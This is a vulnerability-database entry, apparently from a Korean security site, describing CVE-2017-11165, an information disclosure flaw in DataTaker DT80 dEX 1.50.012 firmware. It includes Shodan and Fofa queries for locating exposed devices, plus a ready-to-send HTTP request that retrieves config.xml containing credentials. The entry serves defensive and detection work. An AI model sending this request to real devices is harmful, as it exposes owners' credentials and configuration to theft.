🔙 목록으로 돌아가기

CVE-2017-11165: DataTaker DT80 dEX 1.50.012 - Information Disclosure

TitleDataTaker DT80 dEX 1.50.012 - Information Disclosure
Authortheabhinavgaur
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system.
RemediationApply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability.
CVSS Score9.8
EPSS Score0.91455
CVE IDCVE-2017-11165
CWE IDCWE-200
Shodan Queryhttp.title:"datataker"
Fofa Querytitle="datataker"
Tags cve2017 cve lfr edb datataker config packetstorm exposure vuln

🔍 Vulnerability Description

DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.

🌐 HTTP Request

GET /services/getFile.cmd?userfile=config.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-11165.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-11165.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A